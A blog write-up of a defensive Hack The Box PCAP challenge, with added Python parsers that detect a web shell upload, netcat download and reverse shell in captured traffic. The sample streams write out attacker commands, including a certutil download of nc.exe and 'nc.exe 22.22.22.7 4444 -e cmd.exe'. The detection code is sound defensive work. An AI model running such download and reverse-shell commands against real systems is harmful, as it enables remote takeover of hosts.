Wireshark: The PCAP analysis and network traffic analysis tool.

Chase PCAP Analysis on Hack The Box

Zer0rigin
5 min read, Feb 13, 2022


It has been a while since I have had some spare time to do a PCAP (packet capture) analysis in Wireshark, so I decided to get on Hack The Box this weekend to get some practice navigating Wireshark and analyzing a PCAP.

Getting Started: Wireshark Download and McAfee Active Scan Disabled

To get started I headed to https://www.wireshark.org/ to download Wireshark so I could open the PCAP. I also had to disable my McAfee antivirus active scanner because, although I was able to download the file, when I tried to open the Chase PCAP McAfee kept quarantining it as malicious. After pausing the active scanner for 15 minutes I was able to begin the analysis of the PCAP.

Time to Follow the Trail of Bread Crumbs!

Now that all of that is settled, let the fun begin! The first thing I noticed when examining the packet capture was how relatively small it was compared to some of the PCAPs we looked at during my time in the cybersecurity boot camp at Fullstack Academy. In total there were only 216 packets captured; however, there was still a lot going on here.

Only 216 packets? I got this!

The next key points I noticed were the two IP addresses: 22.22.22.5, the server that the requests are being made to, and 22.22.22.7, the client making the requests and receiving the responses. Then there were two main protocols to focus on, TCP (Transmission Control Protocol) and HTTP (Hypertext Transfer Protocol).

The first three packets are the TCP three-way handshake. The client (22.22.22.7) sends a SYN to the server (22.22.22.5) asking to synchronize; the server answers with a SYN-ACK, acknowledging the client's request and sending its own synchronize; finally the client sends an ACK for the server's SYN-ACK and the connection is established. If this were a normal conversation it would go something like: Client: "Hey, can you hear me?" Server: "Hey, I can hear you. Can you hear me?" Client: "Yes, let's chat!"

Packet Filtering by HTTP Requests

Following the TCP handshake, which establishes the connection between the client and the server, several HTTP requests are made, so I took a look at the HTTP stream in Wireshark and found some interesting stuff. To make the HTTP requests easier to read I filtered the packets by HTTP (the display filter is simply http).

Packets filtered by HTTP requests.

In packet 9 the GET request looks to be navigating to the home page, which shows a welcome image. Next, in packet 18, the user navigates to an upload page on the site. In packet 23 there is a POST request to the upload page; here it looks like the user uploaded the file cmd.aspx as Admin. Then I googled the code and it came back showing that this allows remote code execution through a web shell.

After getting a web shell the attacker downloads netcat, so the intention is clearly to get a reverse shell. This begins at packet 37, where a POST to cmd.aspx carries the command to download netcat and the path it is saved to.

Here is the path and command downloading netcat.
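The same three checks done programmatically, as an added example that is not code from the original post or from Hack The Box: a small parser for the client side of a reassembled HTTP stream that lists multipart uploads, the commands POSTed to the shell, and any netcat call-back in those commands. The stream is constructed for the example; the URIs /upload.aspx and /uploads/cmd.aspx, the form field cmd and the certutil download command are assumptions, not what the Chase capture contains.

```python
import re
from urllib.parse import parse_qs, urlencode

# Added example. SAMPLE_STREAM is CONSTRUCTED: the URIs, the "cmd" form field and
# the certutil download command are assumptions, not the Chase capture's contents.

BOUNDARY = "----ConstructedBoundary"
UPLOAD_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="file"; filename="cmd.aspx"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "<% /* placeholder body, not a real web shell */ %>\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()


def _request(method, uri, body=b"", ctype=None):
    head = f"{method} {uri} HTTP/1.1\r\nHost: 22.22.22.5\r\n"
    if body:
        head += f"Content-Type: {ctype}\r\nContent-Length: {len(body)}\r\n"
    return head.encode() + b"\r\n" + body


def _cmd(command):
    return urlencode({"cmd": command}).encode(), "application/x-www-form-urlencoded"


SAMPLE_STREAM = b"".join([
    _request("GET", "/"),                                    # like packet 9: home page
    _request("GET", "/upload.aspx"),                         # like packet 18: upload page
    _request("POST", "/upload.aspx", UPLOAD_BODY,
             f"multipart/form-data; boundary={BOUNDARY}"),   # like packet 23: shell upload
    _request("POST", "/uploads/cmd.aspx",                    # like packet 37: fetch netcat
             *_cmd(r"certutil -urlcache -f http://22.22.22.7/nc.exe C:\Windows\Temp\nc.exe")),
    _request("POST", "/uploads/cmd.aspx",                    # run netcat back to the attacker
             *_cmd(r"C:\Windows\Temp\nc.exe 22.22.22.7 4444 -e cmd.exe")),
])


def parse_http_requests(stream):
    """Split a client->server byte stream into requests, using Content-Length for bodies."""
    requests, pos = [], 0
    while (hdr_end := stream.find(b"\r\n\r\n", pos)) != -1:
        lines = stream[pos:hdr_end].decode("latin-1").split("\r\n")
        method, uri, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body = stream[hdr_end + 4:hdr_end + 4 + length]
        requests.append({"method": method, "uri": uri, "headers": headers, "body": body})
        pos = hdr_end + 4 + length
    return requests


FILENAME_RE = re.compile(rb'filename="([^"]+)"')
# netcat-style "<tool> <host> <port>" somewhere in a command line
NETCAT_RE = re.compile(r"\b(nc|ncat|netcat)(?:\.exe)?\b.*?(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def uploaded_files(requests):
    """Filenames from multipart/form-data POSTs; a script extension here is the red flag."""
    names = []
    for r in requests:
        if r["method"] == "POST" and "multipart/form-data" in r["headers"].get("content-type", ""):
            names += [m.decode() for m in FILENAME_RE.findall(r["body"])]
    return names


def webshell_commands(requests, shell="cmd.aspx", field="cmd"):
    """Commands sent to the uploaded shell as a form field (field name is an assumption)."""
    commands = []
    for r in requests:
        if r["method"] == "POST" and r["uri"].endswith("/" + shell):
            commands += parse_qs(r["body"].decode("latin-1")).get(field, [])
    return commands


def netcat_callbacks(commands):
    """(tool, host, port) for every netcat invocation that connects out to host:port."""
    hits = []
    for c in commands:
        m = NETCAT_RE.search(c)
        if m:
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits


if __name__ == "__main__":
    reqs = parse_http_requests(SAMPLE_STREAM)
    print("uploads:", uploaded_files(reqs))
    cmds = webshell_commands(reqs)
    print("commands:", cmds)
    print("call-backs:", netcat_callbacks(cmds))
```

To run this against the real capture, save the client side of the HTTP conversation from Wireshark's Follow TCP Stream dialog (direction set to client to server, "Raw" format) and pass those bytes to parse_http_requests; the parser assumes Content-Length framing, so chunked request bodies are not handled.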

At packet 141 there is evidence that netcat was run to open a reverse shell back to 22.22.22.7 on port 4444, where the attacker is listening.

Reverse shell established with netcat.
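At the TCP layer the reverse shell is nothing more than a second three-way handshake in which the web server is now the side sending the SYN. The following is an added example (not code from the original post or from Hack The Box) that reads a classic pcap file directly and applies the SYN / SYN-ACK / ACK logic described earlier: it builds a constructed capture in memory, reports each completed handshake as (client, server, port), and flags connections the web server itself opens to non-web ports. The ephemeral ports, sequence numbers and the GET request in the sample are made up for the example.

```python
import struct

# Added example. SAMPLE_PCAP is CONSTRUCTED in memory (not the HTB "Chase" pcap);
# ports 49152/49200, the sequence numbers and the GET request are assumptions.

PCAP_MAGIC = 0xA1B2C3D4          # classic pcap, microsecond timestamps, little-endian
LINKTYPE_ETHERNET = 1
SYN, PSH, ACK = 0x02, 0x08, 0x10


def _ip(addr):
    return bytes(int(octet) for octet in addr.split("."))


def tcp_frame(src, dst, sport, dport, flags, seq=0, ack=0, payload=b""):
    """Ethernet + IPv4 + TCP frame (checksums left zero; fine for parsing)."""
    eth = b"\x00" * 12 + b"\x08\x00"                          # two MACs + EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload),
                     1, 0, 64, 6, 0, _ip(src), _ip(dst))       # protocol 6 = TCP
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                      5 << 4, flags, 8192, 0, 0)                # 20-byte header, no options
    return eth + ip + tcp + payload


def pcap_bytes(frames):
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for ts, frame in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


# 1) client 22.22.22.7 opens a connection to the web server 22.22.22.5:80
# 2) later the web server itself connects out to 22.22.22.7:4444 (the reverse shell)
SAMPLE_PCAP = pcap_bytes([
    tcp_frame("22.22.22.7", "22.22.22.5", 49152, 80, SYN, seq=1000),
    tcp_frame("22.22.22.5", "22.22.22.7", 80, 49152, SYN | ACK, seq=5000, ack=1001),
    tcp_frame("22.22.22.7", "22.22.22.5", 49152, 80, ACK, seq=1001, ack=5001),
    tcp_frame("22.22.22.7", "22.22.22.5", 49152, 80, PSH | ACK, seq=1001, ack=5001,
              payload=b"GET / HTTP/1.1\r\nHost: 22.22.22.5\r\n\r\n"),
    tcp_frame("22.22.22.5", "22.22.22.7", 49200, 4444, SYN, seq=7000),
    tcp_frame("22.22.22.7", "22.22.22.5", 4444, 49200, SYN | ACK, seq=9000, ack=7001),
    tcp_frame("22.22.22.5", "22.22.22.7", 49200, 4444, ACK, seq=7001, ack=9001),
])


def iter_tcp(pcap):
    """Yield (src, dst, sport, dport, flags, payload) for every IPv4/TCP packet."""
    magic, = struct.unpack_from("<I", pcap, 0)
    if magic not in (PCAP_MAGIC, 0xD4C3B2A1):
        raise ValueError("classic pcap only (pcapng and nanosecond pcap not handled)")
    endian = "<" if magic == PCAP_MAGIC else ">"
    off = 24                                                   # skip the global header
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", pcap, off)
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                           # not IPv4, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data_off = (tcp[12] >> 4) * 4
        yield src, dst, sport, dport, tcp[13], tcp[data_off:]


def find_handshakes(pcap):
    """Return [(client, server, server_port)] for each completed SYN / SYN-ACK / ACK."""
    state, completed = {}, []
    for src, dst, sport, dport, flags, _ in iter_tcp(pcap):
        fwd, rev = (src, sport, dst, dport), (dst, dport, src, sport)
        if flags & SYN and not flags & ACK:                    # "can you hear me?"
            state[fwd] = "SYN"
        elif flags & SYN and flags & ACK and state.get(rev) == "SYN":
            state[rev] = "SYN-ACK"                             # "I hear you, can you hear me?"
        elif flags & ACK and not flags & SYN and state.get(fwd) == "SYN-ACK":
            state.pop(fwd)                                     # "yes, let's chat"
            completed.append((src, dst, dport))
    return completed


def outbound_from_server(handshakes, server, web_ports=(80, 443)):
    """Connections where the web server is the client and the port is not a web port:
    exactly how a reverse shell looks at the TCP layer."""
    return [h for h in handshakes if h[0] == server and h[2] not in web_ports]


if __name__ == "__main__":
    hs = find_handshakes(SAMPLE_PCAP)
    print("handshakes:", hs)
    print("suspicious:", outbound_from_server(hs, "22.22.22.5"))
```

On a real file, pass open(path, "rb").read() instead of SAMPLE_PCAP; the reader handles the classic pcap format only, so a capture saved by Wireshark as pcapng must be exported as pcap first. The Wireshark equivalent of outbound_from_server is the display filter tcp.flags.syn == 1 && tcp.flags.ack == 0 && ip.src == 22.22.22.5, which lists every connection the web server initiated.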

After the netcat connection was established I took a look at the TCP stream to see what commands were run. As seen below, whoami and ipconfig are run, followed by a failed request to download a .txt file and then a successful download right after.

Finally, following the TCP stream at packet 210, the content of the .txt file says "Hey there!"

Oh, “Hey, there!”

That .txt file sure does look like it is encoded. I will put it through CyberChef. YES, LET'S GO, CHALLENGE COMPLETE! :D

Aha! There is the flag to solve the challenge.

In conclusion, that was quite the challenge. Someone warned me that HackTheBox is for more intermediate to advanced users. I am finding that out the hard way, even though this is listed as easy and intro to blue team on HackTheBox. Although I enjoy the challenge, I am beginning to wonder if it will be better to continue my learning journey on TryHackMe instead until I become more advanced at defensive and offensive methods. Regardless, this was an awesome challenge and I had a lot of fun learning and working towards solving this PCAP challenge.

Thanks for stopping by and checking out this latest entry.

Zer0rigin


Zer0rigin

SOC Incident Response Analyst. Adamant about privacy and security. Fascinated by technology ever since a Super Nintendo controller graced my hand.